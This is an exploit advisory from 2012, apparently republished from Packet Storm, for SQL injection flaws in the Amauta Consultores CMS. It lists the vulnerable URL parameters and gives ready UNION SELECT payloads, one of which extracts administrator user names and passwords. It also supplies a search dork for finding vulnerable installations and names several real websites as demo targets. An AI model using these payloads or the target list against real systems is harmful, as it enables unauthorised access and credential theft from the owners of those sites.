Amauta Consultores CMS SQL Injection

2012-04-27T00:00:00
ID PACKETSTORM:112260
Type packetstorm
Reporter Farbod Mahini
Modified 2012-04-27T00:00:00

Description

                                        
                                            `  
########################################################################################  
# #  
# Exploit Title : AMAUTA CONSULTORES CMS SQL Injection Vulnerability #  
# #  
# Author : Secure-Land Security Team #  
# #  
# Discovered By : farbodmahini #  
# #  
# Home : Secure-Land.net #  
# #  
# Vendor : www.amautaperu.com #  
# #  
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #  
# #  
# Security Risk : High #  
# #  
# DorK : "Powered by AMAUTA CONSULTORES S.A.C" #  
# #  
# #  
########################################################################################  
# #  
# Expl0iT: #  
# #  
# http://[TarGeT]/node_events.php?id=[sqli] #  
# http://[TarGeT]/node_news.php?idnew=[sqli] #  
# http://[TarGeT]/node.php?id=[sqli*] #  
# http://[TarGeT]/photos.php?id=[*sqli] #  
# #  
# [sqli*] : #  
# #  
# -9999+Union+select+1,2,3,version()-- #  
# #  
# [*sqli] : #  
# #  
# -1+union+select+1,2,group_concat(user_name,0x3a,user_password)+from+administrators--#  
# #  
# #  
# Demo : #  
# #  
# http://perupromotions.co.uk/photos.php?id=[*sqli] #  
# http://www.petaliecapricci.it/index.asp?p=credits' #  
# http://www.teknosbologna.it/index.asp?p=credits' #  
# http://www.mydylandog.it/index.asp?p=credits' #  
# #  
########################################################################################  
# #  
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #  
# #  
########################################################################################  
# #  
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #  
# #  
########################################################################################  
`